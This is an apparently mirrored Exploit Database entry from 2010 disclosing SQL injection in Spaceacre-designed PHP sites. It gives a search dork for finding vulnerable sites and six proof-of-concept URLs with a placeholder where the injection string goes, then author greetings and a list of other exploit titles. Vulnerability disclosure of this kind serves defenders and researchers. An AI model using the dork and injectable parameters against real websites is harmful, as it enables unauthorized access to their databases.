Spaceacre – Multiple SQL Injections

Exploit Database
15 阅读

作者： gendenk

日期： 2010-05-10
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/12551/

#Spaceacre Multiple SQL Injection Vulnerability
#by Wiro Sablenk aka Gendenk
#vendor :http://www.spaceacre.com/
#dork: "Designed by Spaceacre"
#poc: 

#####################################################
http://[target]/cat1.php?catID=[SQL]
http://[target]/cat2.php?catID=[SQL]
http://[target]/cat3.php?catID=[SQL]
http://[target]/cat4.php?catID=[SQL]
http://[target]/cat5.php?catID=[SQL]
http://[target]/cat6.php?catID=[SQL]


Life is challanging, the fear of challanges, causing you for backwardness..Facing for the bright future..

#Thanks to : cyberlog, cr4wl3r and MAMA Sri Rahayu [ istri cyberlog ] Semoga Cepet Lekas Sembuh

Manadocoding,Sekuritionline,Jatimcrew
#####################################################

last Exploits
Spaceacre – Multiple SQL Injections的更多信息

WhatsApp Desktop 0.3.9308 – Persistent Cross-Site Scripting：
Collectric CMU 1.0 – ‘lang’ Hard-Coded Credentials / SQL injection：
WordPress Core 3.4.2 – Multiple Path Disclosure Vulnerabilities：
DIGISOL DG-HR3400 Wireless Router – Cross-Site Scripting：
FLIR Thermal Traffic Cameras 1.01-0bb5b27 – Information Disclosure：
Zyxel, EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection：
EMC xPression 4.5SP1 Patch 13 – ‘model.jobHistoryId’ SQL Injection：
OpenEMR 6.0.0 – ‘noteid’ Insecure Direct Object Reference (IDOR)：